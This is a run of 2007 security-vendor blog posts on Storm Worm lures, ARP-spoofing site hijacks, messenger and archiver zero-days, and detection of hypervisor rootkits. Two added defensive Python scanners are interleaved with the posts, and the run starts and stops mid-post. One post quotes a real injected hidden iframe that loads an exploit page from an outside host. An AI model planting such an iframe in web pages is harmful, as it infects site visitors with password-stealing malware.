Like previous variants, the HTML page contains a script that attempts to execute the malicious file hosted on the webserver. However, even if this exploit code is blocked by AV software, or is not executed at all because of the browser’s security settings, the user still has the option to click on the download button and infect their machine.

McAfee VSE8 Alert

Make sure you’re protected so you do not join the Storm network!

No laughing matter or Curiosity killed the cat

Nuwar (aka Storm Worm) changed tactics yet again. Now it attempts to lure its victims by a promise of a good laugh at a “Psycho cat”:

If you do click on the URL you get a page loaded with the usual cocktail of exploits etc.:

So, if you’re not running an on-access antivirus you are in trouble. The page itself pretends to be a funny greeting, complete with a ShockWave clip of a laughing kitty with an appropriate and rather infectious (pun intended) laughter audio.

And, of course, pretty much wherever you click on the page, you get nothing but Nuwar.


Nod to more ARP mayhem ?

Following our blog about the significance of web hosting security vs ARP spoofing, our friends from security vendor ESET made an official statement on October 9th about an ARP attack against their official China website earlier this week. Identical to other ARP attacks, the following malicious IFRAME link was found inserted into their web pages:

<iframe src=http://fs18.net/down{blocked}/yy.htm width=20 height=0 frameborder=0></iframe>

The “yy.htm” web page, detected generically as Exploit-MS06-014, can download a variety of malware including:

  • vip1.htm (Exploit-BaoFeng.a)
  • 0.exe (PWS-QQGame)
  • kvmxeis.exe (PWS-OnlineGames.a)
  • ii.exe (PWS-QQPass.dll)
  • SysWin78.Jmp (PWS-QQGame)
  • WinSys88.Sys (PWS-QQGame)
  • System6.ins (PWS-QQPass.dll)

In 2007, hijacking of popular websites has become one of the many effective malware propagation methods in China. From W32/Fujacks-style web page infection to ARP spoofing, we have seen many important websites reportedly hijacked to host exploits and malware since the end of 2006.

With relatively good success, this means of malware infection and exploitation has also rapidly evolved from common Microsoft vulnerabilities (Exploit-MS06-014, Exploit-MS07-004, etc.) to application-level vulnerabilities in Yahoo Messenger, a Chinese media player called Baofeng, and PPStream.

Network intrusion prevention, web server policies and patch management come to mind as the needed minimum defenses, and should be reviewed by companies using or offering web services as well as by ISPs.
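The post describes pages being altered by ARP spoofing on the hosting LAN rather than by a compromise of the web server itself. One cheap sensor-side defence that fits the “network intrusion prevention” item above is to watch ARP replies and alert whenever an IP address that was bound to one MAC suddenly claims another, since that rebinding is exactly what a spoofing host must do to insert itself into the path. The following is an added example, not code from the original post or from McAfee; the ARP records it runs on are constructed.

```python
"""Detect IP-to-MAC rebinding in a stream of ARP replies (added example)."""
from collections import namedtuple

ArpReply = namedtuple('ArpReply', 'ts ip mac')

# Constructed capture: the gateway 10.0.0.1 is legitimately at ...:01, then
# a second host starts answering for it and the binding flaps.
SAMPLE_REPLIES = [
    ArpReply(1.0, '10.0.0.1', 'aa:bb:cc:00:00:01'),
    ArpReply(2.0, '10.0.0.50', 'aa:bb:cc:00:00:50'),
    ArpReply(3.0, '10.0.0.1', 'aa:bb:cc:00:00:01'),
    ArpReply(4.0, '10.0.0.1', 'aa:bb:cc:00:00:99'),   # rebinding: alert
    ArpReply(4.5, '10.0.0.1', 'aa:bb:cc:00:00:01'),   # flaps back to the original
    ArpReply(5.0, '10.0.0.1', 'aa:bb:cc:00:00:99'),   # and away again: alert
]


def detect_rebinding(replies, trusted=None):
    """Return a list of alerts (ts, ip, expected_mac, claimed_mac).

    trusted: optional {ip: mac} of statically known bindings (gateway, DNS
    server, etc.); a reply contradicting one of them alerts on first sight.
    Otherwise the first MAC seen for an IP is taken as the reference and kept,
    so a spoofer that keeps flapping keeps producing alerts.
    """
    table = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    alerts = []
    for r in replies:
        claimed = r.mac.lower()
        known = table.get(r.ip)
        if known is None:
            table[r.ip] = claimed
        elif known != claimed:
            alerts.append((r.ts, r.ip, known, claimed))
    return alerts


def offending_macs(alerts):
    """Set of MACs that claimed an IP they were not expected to hold."""
    return {claimed for _, _, _, claimed in alerts}


if __name__ == '__main__':
    found = detect_rebinding(SAMPLE_REPLIES,
                             trusted={'10.0.0.1': 'aa:bb:cc:00:00:01'})
    for ts, ip, expected, claimed in found:
        print(f"t={ts}: {ip} expected {expected}, got {claimed}")
    print("offending MACs:", offending_macs(found))
```

Feeding this with a static table for the gateway and other critical hosts is what turns it from an anomaly detector into a policy check; without one, the first reply seen wins, and a spoofer that is already active when monitoring starts will be taken as the legitimate owner.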

Labor Day gift from Nuwar!

W32/Nuwar, aka the Storm worm, has relentlessly flooded internet users with its ever-changing email campaigns ever since its debut in Nov 2006. With the Storm worm authors having an uncanny knack for sensationalist themes that draw public attention, the morbid curiosity it has generated has ensured that it is the most blogged-about piece of malware this year!

The latest campaign is an HTML formatted email using the Labor Day theme, inviting users to view an online greeting card. A copy of the spammed email is as follows:

Copy of Spammed Email.

The authors have used anchor tags in HTML to mask the greeting card link so that an unsuspecting user does not notice that it actually points to a malicious IP address. Hovering the mouse over this disguised link is a quick and dirty way to reveal the real destination address. Users who fall for this bait are directed to the following Happy Labor Day page.
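Hovering over a link works for one user and one message; a mail or web gateway needs the same check done mechanically. The scanner below is an added example, not code from the original post or from McAfee. It covers two indicators from this archive: the anchor whose visible text is a URL but whose href resolves to a different host or a bare IP address (the Labor Day mail above), and the zero-height IFRAME to an offsite host injected into hijacked pages in the ARP spoofing post. It is built on html.parser from the standard library; the sample HTML is constructed and its hostnames are placeholders in reserved ranges.

```python
"""Flag deceptive links and hidden frames in HTML (added example)."""
from html.parser import HTMLParser
from urllib.parse import urlparse
import ipaddress

# Constructed sample: one masked link to an IP, one honest link, one hidden
# offsite iframe and one ordinary same-site frame.
SAMPLE_HTML = """
<html><body>
<p>You have received a greeting card. View it here:</p>
<a href="http://192.0.2.10/labor.html">http://www.example-greetings.invalid/card</a>
<a href="http://www.example.com/about">About us</a>
<iframe src="http://fs18.invalid/down/yy.htm" width=20 height=0 frameborder=0></iframe>
<iframe src="/player.htm" width=300 height=200></iframe>
</body></html>
"""


def host_is_ip(href):
    """True when the URL's host is a literal IP address rather than a name."""
    host = urlparse(href).hostname
    if not host:
        return False
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def looks_like_url(text):
    text = text.strip().lower()
    return text.startswith(('http://', 'https://', 'www.'))


class IndicatorScanner(HTMLParser):
    """Collects (indicator, url) findings while parsing a page or mail body."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host   # host the document legitimately came from
        self.findings = []
        self._href = None            # href of the <a> currently open, if any
        self._text = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == 'a':
            self._href = a.get('href') or ''
            self._text = []
        elif tag == 'iframe':
            src = a.get('src') or ''
            host = urlparse(src).hostname
            tiny = a.get('height') in ('0', '1') or a.get('width') in ('0', '1')
            if host and host != self.page_host and tiny:
                self.findings.append(('hidden_offsite_iframe', src))

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag != 'a' or self._href is None:
            return
        text = ''.join(self._text)
        if host_is_ip(self._href):
            self.findings.append(('ip_link', self._href))
        if looks_like_url(text):
            shown = urlparse(text if '://' in text else 'http://' + text).hostname
            real = urlparse(self._href).hostname
            if shown and real and shown.lower() != real.lower():
                self.findings.append(('masked_link', self._href))
        self._href = None


def scan_html(html, page_host):
    """Return the list of (indicator, url) findings for one document."""
    scanner = IndicatorScanner(page_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == '__main__':
    for kind, url in scan_html(SAMPLE_HTML, 'mail.example.com'):
        print(kind, url)
```

For mail there is no “page host”, so pass the sending domain or None; the iframe rule then treats every framed host as offsite, which is what you want in a message body.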

Happy Labor Day bait page.

Everything looks hunky-dory, except that the unsuspecting user is served an xor’ed exploit cocktail in the background. In addition to the usual Microsoft exploits, QuickTime and WinZip buffer overflow exploits are also attempted on the user’s machine. Since third-party applications are rarely up to date on a user’s machine, this increases the attacker’s chances of successful exploitation, especially as most applications do not support automated updates and it is left up to the user to first find out whether they have a vulnerable version of the application and then patch it manually.

Enterprise customers have the bandwidth and resources to ensure every machine on the corporate network is fully patched. It is usually home consumers, the low-hanging fruit, who fall prey to these malicious tactics. For users wanting to check if third party applications on their systems are vulnerable, a free online resource to visit would be the Secunia Software Inspector. Happy Patching :D

Yahoo Fixes Webcam Vulnerability

The patches for the Webcam vulnerabilities we reported earlier have been released by Yahoo. We urge Yahoo Messenger users to download the latest Messenger. Thanks to the Yahoo security team for working with us to resolve this issue in a short time. Here’s what you need to know.

New Anti-Virus Book Hot Off the Presses

I’m excited to announce YAAVB! No doubt you recognize that acronym as “yet another anti-virus book.”

And the book that I am proudly holding in my hands is entitled “AVIEN Malware Defense Guide,” and I contributed a chapter to it.

book

In its 540 pages we cover the following topics:

  1. “Customer Power and AV Wannabes”
  2. “Stalkers on Your Desktop”
  3. “A Tangled Web” (by yours truly)
  4. “Big Bad Botnets”
  5. “Creme de la Cybercrime”
  6. “Defense-in-depth”
  7. “Perilous Outsourcery”
  8. “Education in Education”
  9. “DIY Malware Analysis”
  10. “Antimalware Evaluation and Testing”
  11. “AVIEN and AVIEWS: the future”

Here’s the team that worked on this book: David Harley, Ken Bechtel, Michael Blanchard, Henk Diemer, Andrew Lee, Igor Muttik, Bojan Zdrnja, Paul Baccas, Tony Bradley, Ken Dunham, Jim Melnick, Enrique Gonzalez, Judith Harley, Dave Phillips, Paul Schmehl, Robert Vibert, and James Wolfe. I would like to express my sincere thanks to David Harley, who put together this team of professionals and led us through a book-writing exercise. It was fun!

I have not yet read all the chapters, but I know the guys well and expect great contributions from all of them!

The book came out under the umbrella of AVIEN (Anti-Virus Information Exchange Network–www.avien.net). This group was formed around 2001 to exchange information related to malware outbreaks. In recent years, due to the lack of large-scale outbreaks, participants simply share all sorts of security information and enjoy communicating with each other. One of the outcomes is this book.

Finally, the book was published by Syngress, retails for US$59.95 (ISBN-13: 978-1-59749-164-8), and is available from major book stores: http://www.amazon.com/AVIEN-Malware-Defense-Guide-Enterprise/dp/1597491640. So far there are two positive reviews, though both came from the team of authors. :-)

I hope you enjoy the book, and I look forward to reading your valuable comments!

Targeted Zero-day Attack Against Free Tools - LHAZ

Another exploit targeting a Japanese application was found today. This time, a free decompression tool, LHAZ v1.33, was used in a targeted attack. Maliciously crafted zip files could take advantage of an unidentified vulnerability in this tool and drop a BackDoor-CKB trojan.

Two months ago, we published information about an exploit against a free LHA decompression tool, Lhaca, which is quite popular in Japan.

Whilst these tools may not be as widely used as commercial tools, the perception could be that such free tools are not worth targeting and are safe to use. Exploit-LHAZ.a is just a reminder that software, whether Windows or MacOS, English or localized, free, open source or commercial, is subject to the same security threats.

More details of Exploit-LHAZ.a at http://vil.nai.com/vil/content/v_142976.htm.

Update: More on the Yahoo Messenger Webcam Zero-Day

[UPDATE]
Yahoo has fixed its Webcam vulnerability. The patches for the Webcam vulnerabilities have been released by Yahoo. We urge Yahoo Messenger users to download the latest Messenger. Thanks to the Yahoo security team for working with us to resolve this issue in a short time. Here’s what you need to know.

[Original blog:]
Earlier today Karthik blogged about details of a new zero day in Yahoo! Messenger being published on some security forums in China. We got a chance to dig a bit deeper into this and were able to reproduce the vulnerability on Yahoo! Messenger version 8.1.0.413 based on the information provided in the forum. It seems like a classic heap overflow which can be triggered when the victim accepts a webcam invite. Note that this vulnerability is different from the one patched in June, which exploited the Yahoo! Webcam ActiveX controls.

We’ve been able to reach Yahoo! security team and have informed them about this issue. 

We recommend the following to users using Yahoo! Messenger Webcam:

1) Don’t accept webcam invites from untrusted sources until a patch for this is released.

2) It’s advisable to block outgoing traffic on TCP port 5100 until the vendor patches this vulnerability.

To mitigate this, we’re releasing our NIPS IntruShield signatures today to protect Yahoo! Messenger users from this threat. We shall keep on monitoring this threat and update if we come across anything.

Potential Yahoo Messenger Zero-Day

A post on a Chinese-language security forum claims that there is a zero-day vulnerability in Yahoo Messenger. Researchers at Avert Labs have found that this flaw may allow for user-assisted remote-code execution attacks. No code exploiting this flaw has been published yet.

We’re currently working with Yahoo to be able to confirm or deny that this is a zero-day.

We’ll keep you updated.

The truths and myths about Blue Pill and virtualized malware

We have been studying the issue of malicious hypervisors for quite some time at McAfee Avert Labs and have come up with several techniques to detect whether the system runs on top of a hypervisor or whether there is a piece of code that is trying to initiate a hypervisor. Our work included, of course, analyzing things like Blue Pill and other similar malicious hypervisors.

Last week I was at BlackHat, and it was a very exciting week in terms of Blue Pill and the virtualization rootkits issue in general. During the BlackHat 2007 Briefings in Las Vegas there were three interesting sessions that relate to virtualization system security and rootkits. I attended those three sessions and had a chance to chat some with three presenters. The main points I would emphasize are the following:

  1. Providing a system virtualization facility at the processor level without applying any sound security policy is a serious design flaw.
  2. A malware author’s job is to leverage system design flaws, and hence virtualization rootkits, including Blue Pill, were to be expected.
  3. There is no rootkit that is undetectable, even if it installs itself as a hypervisor. The challenge is always in how to repair rootkits once they control some layer in the system architecture.
  4. There needs to be a more organized effort between hardware virtualization vendors, software hypervisor providers and security companies to ensure the secure deployment of virtualization solutions.

Now before I go into what happened during the three sessions at BlackHat, I would like to provide our readers with some background and personal thoughts about this topic. Less than two years ago, both Intel and AMD started to provide virtualization support at the processor level. This support is essentially comprised of a set of processor enhancements that improve traditional software-based virtualization solutions. These integrated features give virtualization software, namely Virtual Machine Monitors (VMMs) and Hypervisors, the ability to offload work to the system hardware, enabling more streamlined virtualization software stacks and “near native” performance characteristics. For instance, virtualization-enabled processors allow VMMs to rely on the hardware for isolating and mapping memory between virtual machines. This is achieved by adding another level of indirection for mapping VM-based physical addresses to host-based physical addresses. Both Intel and AMD also provide an additional level of indirection for mapping VM I/O addresses to host I/O physical addresses. Virtualizing memory addresses and I/O addresses at the processor level is a great extension that minimizes the work done by today’s software hypervisors. However, in doing that neither Intel nor AMD considered the security risk of providing such a powerful facility in the hardware with no restriction on which piece of software could take advantage of it. In theory there have been lots of publications about safer computing initiatives and how to use TPM technology to authenticate the piece of software that initializes the processor into virtualization mode. But in reality, this was not provided in the first release of the virtualization-aware processors, as hypervisor authentication was not provided at the firmware or BIOS level.

Now think of that with me for a moment – we now have a very powerful, unlocked facility in the processor that allows any piece of software running in ring zero (like a device driver) to initialize a processor-supported hypervisor and hence take control of the whole computing environment, including the operating system. Yes, this is true, and it was a serious design flaw. Of course both Intel and AMD designers assumed that operating system kernel developers are the only ones who would care about virtualization and would use that facility provided by their processors, which turned out to be untrue. Joanna Rutkowska (the Blue Pill author) and other people have demonstrated some sample code that would initiate a hypervisor, and since it runs outside the operating system it can be considered a rootkit. But as the reader may understand now, there are no secrets there. No undocumented stuff; it is all about a powerful hardware feature that was not protected by any security policy.

Now to make the situation worse, both Intel and AMD are competing in that space and I guess both are trying to get software virtualization vendors to rely on their processors’ native virtualization support. But software-based hypervisors do more than memory and I/O virtualization. They do binary translation, for instance, which allows them to control programs’ execution at the instruction level and control programs’ response to system interrupts. To accommodate that need, both Intel and AMD provide the ability to exit from the VM to the VMM when a certain instruction is executed or a certain condition takes place inside the VM. For hackers this is a very lucrative feature, so not only can they install a thin hypervisor but they can also control the execution of certain instructions and fake many things from below the operating system, like timestamp counters, which used to be a very reliable method for measuring elapsed time. When looking at the Intel and AMD virtualization specifications, it does not look like they require many things from the hypervisor. In other words, it is up to the hypervisor to decide what it wants and what it does not want to virtualize. This by itself lowers the cost of making a malicious hypervisor. Let me conclude this introduction by making the following statements:

  • Providing hardware-based virtualization support without protecting it with a sound security policy is a major flaw in the system design;
  • Hardware assisted hypervisors have the freedom to choose which software execution facility to virtualize and control;
  • Blue Pill and other types of malicious hypervisors were anticipated by security experts who are well acquainted with the processor architecture.

I think I have provided quite enough background as well as some personal thoughts on the subject, so let’s move on to talk about what happened at Las Vegas last week. As I said there were three sessions that related to virtualization based malware and Blue Pill:

  1. “Don’t Tell Joanna, The Virtualized Rootkit Is Dead,” by Thomas Ptacek, Nate Lawson and Peter Ferrie;
  2. “IsGameOver(), anyone?,” by Joanna Rutkowska and Alexander Tereshkin; and
  3. “Kick Ass Hypervisoring: Windows Server Virtualization,” by Brandon Baker.

The first session was the “Don’t tell Joanna” on Wednesday morning. The main point we got from that session is that it is very easy to detect virtualization rootkits. Speaking from my experience in the anti-rootkit space over twelve years, including my last project/product offered by McAfee “The McAfee Rootkit Detective”, I totally believe that “there is no rootkit that is undetectable”. I also tried to emphasize that fact in a McAfee podcast recorded before Black Hat. In their session Peter, Thomas and Nate focused more on time-based detection methods by calling an instruction that would cause the system to exit from the VM to the VMM, then measure the time elapsed until the execution is back to the VM and compare that with the regular time taken when running without the hypervisor. I have always liked that time-based approach and it was heavily discussed in Avert Labs some time ago, but we thought of using some other non-time based methods that rely on observing changes made to some processor status and cache fields like TLB (Translation Lookaside Buffers). Anyhow, after the session ended I talked for about an hour or more with Peter Ferrie – I told Peter that it was a very nice presentation and that my personal research findings support their conclusions although I use some different non-time based detection methods. Peter and I were wondering how Joanna would respond in her presentation in the afternoon.

Then came the afternoon and I was sitting there in the second row in front of Joanna. Joanna seemed a little bit nervous when she started her presentation. Initially Joanna picked again on Windows Vista by showing some Vista-signed drivers that allow anyone to write to any kernel memory or modify the MSR (Model Specific Register). That was nice but it is something we see every week at Avert Labs, so nothing new in it to me at least. Then came the second part of Joanna’s presentation and she started to say how her Blue Pill rootkit can adjust the time stamp counters in such a way that would not allow any code to detect the overhead of running on top of a hypervisor. I made a comment in the form of a question during the presentation but Joanna said questions would be answered only after she finished the presentation. The point I wanted to make, and maybe Joanna is reading this now, is that her argument of being able to fix the time stamp counters is not a strong technical argument for the following reasons:

  1. This would require Blue Pill to emulate all the processor instructions that cause a VM exit and adjust the time stamp counter. Therefore we are no longer talking about a thin hypervisor that intercepts only specific instructions, interrupts, etc., but rather about a heavy hypervisor that would require a significant amount of work from Joanna and her team.
  2. The detection code can still issue arbitrary I/O requests to any I/O device that may be doing nothing but causing a VM exit and would then calculate the execution time. This would require Blue Pill to handle requests to I/O devices.
  3. Manipulating time stamp counters does not seem to be a wise thing to do and there might be some device drivers that rely on the validity of those time stamp counters to perform correctly.

During the session I started questioning the value in spending all that time trying to build a Blue Pill that cannot be detected. There are many factors to consider like:

  1. One day soon either hardware systems or operating systems will ship by default with a hypervisor. That hypervisor would have to be the first hypervisor and would not allow nested hypervisors. Intel has already produced the Intel AMT/vPro systems that ship with a hypervisor. Microsoft is soon to release the next version of its server platform that has a built-in hypervisor.
  2. There are only a few commercial hypervisors and most provide some interface to the VM to communicate with the hypervisor if it exists. This interface can be used to authenticate the hypervisor. Security software can decide to halt the system if the system is not running on a hypervisor that is trusted by the company security policy. McAfee as a security company certainly encourages hypervisor vendors to pay more attention to those interfaces and make them solid enough to be used by security software running inside the VM.
  3. Maybe Joanna can still claim that Blue Pill will emulate that commercial hypervisor interface, which is another layer in the system that would be emulated to hide its presence. Still we have a valid question: “what is this all about”. Eventually and very soon there will be only certain hypervisors that are trusted by the firmware and that’s it.

Anyhow, I felt kind of bored in the middle of the presentation and started to write a simple detection method that is not time-based and would definitely detect if the system is running on top of a hypervisor or not. This technique is based on some research I was doing less than a year ago at Avert Labs. Here is a scanned image of my handwritten notes on that approach, made during Joanna’s presentation.

Link to my Blue Pill notes here.

This detection method relies also on another major design flaw in the existing processor architecture. Here is some technical background: processors use TLBs (Translation Lookaside buffers) to cache the mapping from virtual (more accurately linear) addresses to physical addresses. But in doing that processors need to know where to get the address translation or mapping from. Well the mapping is stored inside the PTE (Page Table Entries). But the question is who would fill those entries inside the PTE? Well presumably (at least by the system designer) it’s the operating system of course. But guess what? PTEs themselves are writable and any code running in ring zero (like a device driver) can modify PTEs and hence change the mapping of linear addresses to physical addresses. Hah, this is the trick, and here is how the detection code works:

  1. Allocate large contiguous block of non-paged memory;
  2. Fill that allocated memory with character ‘A’;
  3. Allocate another contiguous block of non-paged memory of the same size like block ‘A’;
  4. Fill that second allocated memory with character ‘B’;
  5. Freeze the execution of the operating system (do not ask how but we can do it);
  6. Invalidate all TLB entries. There are processor instructions for that, which could be as simple as reloading the page directory base register: “mov cr3, system_page_directory_table_address”;
  7. Read the first byte of each page in the allocated ‘A’. This would cause those entries to be added to the processor TLB cache;
  8. Change the mapping of the allocated ‘A’ pages to point to physical memory holding pages ‘B’. This means that what the processor uses inside the TLBs is not what is there in the PTE;
  9. Call any instruction that would cause an exit to the hypervisor if it exists like CPUID. Exiting from the VM to the VMM causes the TLBs to be invalidated or cleared; and
  10. Try to read the virtual memory of the first allocated block. If you see character ‘A’ then it means that the processor found entries in the TLBs and hence those entries were not cleared during an exit from the VM to the VMM. If it reads ‘B’, then it means that the TLB entries were invalidated due to the existence of the hypervisor and the processor had to use the PTEs again to get the mapping from virtual to physical.

I wrote those steps briefly in my BlackHat conference notepad and waited for the session to end. Then to my surprise, just before the end of the presentation Joanna had a slide that mentioned a detection method similar to mine but without the step that freezes the system. I kind of felt proud of myself, of course, and showed the person next to me that I had it written in my notepad. Anyhow, after briefly describing that detection method Joanna said that it does not work and the people who came up with it did not try it. Well, that was too much! I have been researching that space for quite some time and I know it works!

After Joanna finished her presentation, of course with no room for asking questions or making comments, I felt that maybe I needed to talk with her. I waited until the crowd around Joanna was reduced to a few people, including my friend Peter Ferrie, and I went to talk to Joanna. I told her “Joanna, this detection method that you mentioned at the end of your presentation should work and we have tried similar things.” Joanna looked at me and said no it does not. I said well I know it works. She then grabbed my conference ID and looked at my name while asking me who I am. I said Ahmed Sallam from McAfee Avert Labs. Joanna said she did not know that McAfee is working on that and I told her that we have been researching that area for some time. She then asked how it worked; I said that this is not a subject to be discussed in front of a crowd. But in all cases, Joanna, we can detect the Blue Pill, so you may stop claiming that it is undetectable.

That was the end of the first day at Black Hat and I started to feel that we have been putting too much energy into something that may not deserve all the time and effort that we have been putting into it.

Now let’s get to the third session, “Kick Ass Hypervisoring: Windows Server Virtualization” by Brandon Baker from Microsoft, the following day. I went to the session very excited, waiting for Microsoft to outline their plan for how to secure the hypervisor or to leverage the hypervisor for better security. I heard none of that. As a matter of fact, Microsoft said that they are not utilizing the processor-based DMA remapping feature, which allows true isolation of physical memory and hence protects against DMA-based physical memory attacks. We certainly understand that Microsoft is working hard to build its new hypervisor, but we need to hear some good answers on Microsoft’s plans to make its hypervisor truly secure.

I hope that our blog readers now have a better understanding of this serious topic. I would like to conclude this post by re-emphasizing the importance of an organized effort between hardware virtualization vendors, software hypervisor providers and security companies to ensure the secure deployment of virtualization solutions.

Full-Disclosure Immunity Debugger Hoax?

Oh, the irony: apparently someone has taken issue with some of the things I have said about the Immunity Debugger, available from Immunity, and posted an alleged backdoor within the program to the full-disclosure mailing list! Below is a copy of the beginning of the post:

From: goudatr0n
Date: Thu, 9 Aug 2007 13:58:01 -0400 (EDT)

Infosec researchers with the Greater Alliance of PHP
Programmers, headed by goudatr0n and in cooperation
with David Marcus, have discovered a backdoor in the
new Immunity Debugger.

1. PRODUCTS AFFECTED
Immunity Debugger (Immunity Security,
http://www.immunitysec.com/products-immdbg.shtml), All
Versions

2. OVERVIEW
The Immunity Debugger contains a backdoor that emails
session history, running applications and other system
information (location, IP address, machine Owner Name)
to an email address at immunitysec.com

The original post with full text and comments can be read here. Needless to say, I am not involved in any way. Let me restate that I think this is a very powerful tool that was written for all the right reasons. My objection to it is how it can be used by all the wrong people to write more zero-day exploits, quicker and more efficiently. That puts users at risk. I know this is not the intent of the tool or of Immunity.

I gotta say tho that anyone who takes the time to go through this much trouble to goof on me, I got nothing but love for!

The Zen of DefCon 15 Part 1

DefCon gets quite a lot right, and it is not just great content. Actually the content, IMHO, might be the LEAST important aspect of DefCon.

Let’s be honest here. We are all infosec warriors in the information age. We all keep pretty much up to date on security research, malware developments, game hacking, etc. on a daily basis. Blogs, forums, podcasts and other media allow us to stay on the bleeding edge. We have to. Most information in most presentations at most conferences is a good six months old (not always, but usually). This is where DefCon distances itself from the pack.

If you really want to see where security theory and research practicality collide (fueled by Brew and Coffee Wars!), then the floor of DefCon is the place to be. Truthfully, it is the activities of DefCon, not the presentations, that you need to get caffeinated for:

* The Network @ DefCon
* 0wn the b0x
* Phreaking Challenge
* CTF (if you gotta ask…….)
* aCTF
* LPCON5 - Lockpicking Contest
* Hacker Jeopardy (one of my personal favorites)
* TCP/IP Drinking Game
* Wardriving Contest
* Wireless Village - ChurchofWiFi
* Lockpicking Village

No disrespect to the presenters or any of their content but pwning-in-action is what makes DefCon well…….. DefCon. This is where the training, conferences and theory all meets the pavement. Can you get root? Can you stop someone from getting root? Do you really know what you are doing? Hey, is that a custom PWS variant that just pwned my data? Ohhhh, I never saw that evasion before!!! It is events like the above where the real education takes place.

Oh, and the Toxic BBQ! Part 2 later today…..

SiteAdvisor Blog Love

Our SiteAdvisor researchers have their own blog. It’s got great content: these guys get to see all the nasties the web has to offer, so they have a fascinating array of videos, images and in-depth analysis of malware and phishing attacks.

Their most recent post is about hosting sites being targeted as places to host drive-by exploits. This underscores the trend we’ve been seeing of cybercriminals staying on the cutting edge of technological innovation. Whenever there’s something new that makes hiding and distributing their creations easier or more effective, they’ll be on it like rats on a Cheeto.

Be sure to add their blog to your list of sites to check for the latest news on all things web-security related!

MS07-027: Revenge of the Script Kiddies

While we have been talking about the rise of organized cyber crime, the script kiddies have not been taking a break. CVE-2007-2221 was patched in MS07-027 on May 8th, 2007, barely two days after a proof of concept was published on the Internet. During the weeks that followed, we saw the original proof-of-concept exploit code posted to hundreds of script kiddie websites and forums. Fine, every proof of concept we’ve seen in the past has spread like wildfire; and CVE-2007-2221, a vulnerability in a non-default Windows component, is unlikely to have an impact quite like Exploit-AniFile.c. So what’s the big deal?

Amusingly, we see many variations of the original proof-of-concept code. In most cases we know they all originated from the same source, because none of the comments or the author’s name were changed (oh yes, script kiddies give credit too). Some impress with shellcode “boosters”, others rip off a heap buffer overflow “turbo-kit” from Exploit-VMLFill; all that for a vulnerability that doesn’t even involve a buffer overflow. With so many script kiddie goodies around, it even got a GUI script kiddie tool, written by an 18-year-old.

What brought this to our attention was an in-the-wild discovery of Exploit-CVE2007-2221. We believe this is the first time a malicious exploit for CVE-2007-2221 has been found in the wild. Exploit-CVE2007-2221 abuses a vulnerability in a Microsoft Windows Media Server 4.1 component, reached through Internet Explorer. When successful, attackers can overwrite arbitrary files on the victim’s machine with malware.

The discovered exploit code was hosted on hxxp://web733{blocked}914.{blocked}.128web.com which was reportedly hosting the infamous Exploit-AniFile.c back in March 2007. At the time of writing, the malicious payload was no longer available for download. Exploit-CVE2007-2221 used on this site was, as you guessed, generated with that “shellcode-enhanced” script kiddie tool.

As for the malicious sites monitored by McAfee Avert Labs, some are dead, have moved, or no longer host exploit code. However, as long as site administrators do not enforce a policy of taking malicious sites down, many will continue to seek opportunities to host new malware, and will be reawakened whenever a new exploit is made available for their malicious activities. And did they tell you the exploit code doesn’t even have to make sense?

Mapping the Future of an Exploit

Last month we posted a blog entitled Malware Exploits Microsoft “Feature” Along With Vulnerabilities. What prompted that entry was the discovery of malware exploiting the way Internet Explorer handles character encoding, an issue first reported last year. Since then we’ve been tracking the posting of exploits targeting this vulnerability. To date we’ve identified 256 obfuscated pages hosted on 198 unique domains. This Google Map plots the geographic locations of the servers hosting the malicious files.

As you can see, the majority of the servers are hosted in China. The irony is that the flaw exists because of how IE handles US-ASCII encoded pages: the behavior is there for the “benefit” of English-reading viewers, and yet non-English users are the ones most targeted. Attacks succeed against such targets because the malicious HTML pages explicitly declare US-ASCII as their character encoding. It doesn’t matter what encoding the victims configured in their browsers; whichever encoding is declared within the HTML is the one Internet Explorer uses.

We took a sampling of 89 URLs to catalog the payloads of the malicious code. In virtually all cases, patched Internet Explorer vulnerabilities lay beneath the obfuscation layer, and it is fairly common for one page to contain multiple exploits. Here’s a breakdown of the exploits found under the obfuscation:

19 of the obfuscated pages were very obviously created with a readily available exploit creation tool. (The page authors didn’t bother removing the comments that make it obvious how the pages were created.)

We also found that in the vast majority of cases the final payload had been removed, while the pages that led victims to the now-absent payloads were still present. Additionally, a third of the pages charted as MS07-017 exploits had their target ANI files removed; all that remains is the HTML pointing to the files (which, all things considered, we assume were MS07-017 exploits). Perhaps the content scanning that removed the payloads couldn’t recognize, or decode, the obfuscation of the pages themselves.

Finally, four of the domains involved in the attacks are associated with Chinese government sites (.gov.cn), and at least two others rely on social engineering in that they are similar to trusted sites.

So where is this all headed?
As we stated last month, this vulnerability has been discussed before. Given the uptick in malicious usage, the concentration of attacks originating from (and targeting) China, and all of this coming on the heels of the worst vulnerability affecting Microsoft Vista to date (which was disclosed after public exploitation was discovered, in China), we can expect Microsoft to release an official statement on this issue sooner or later. The longer the issue goes unaddressed, the more likely it is that a new IE zero-day attack will leverage this method of obfuscation to conceal its presence just a little bit longer, and the likelihood of such an attack emanating from China is higher than anywhere else right now. Unfortunately, it might just take such an event for this issue to become a priority.

Tales of Threat Assessment

As one of the researchers responsible for the McAfee Avert Labs Security Advisories, my job is to find and report on issues that could affect our customers’ networks and resources in any number of negative ways.

Let’s face it: with vulnerabilities released almost constantly, it’s extremely difficult for administrators not only to find all the latest threats, but also to map them to how well they can mitigate them. Questions like “Does my defense-in-depth strategy protect me against vulnerability X?” or “How does this new malware affect my remote VPN hosts?” will replace those sugar-plum dreams quicker than you can say ‘covered’. Vulnerabilities, exploits and patches are published at a pace that seems to increase daily. Sometimes these are coordinated through ‘responsible disclosure’, with researcher and vendor notification. More often than not, however, they are not. Ever hear of the term ‘zero day’?

As the aforementioned threat researcher by trade, I would like to give you a short narrative of the basics one may follow to find and mitigate threats. You may not have resources such as several research teams dedicated to discovery, as McAfee and others do, so adjust to the size of your pond as necessary.

Step One. Grab your net.

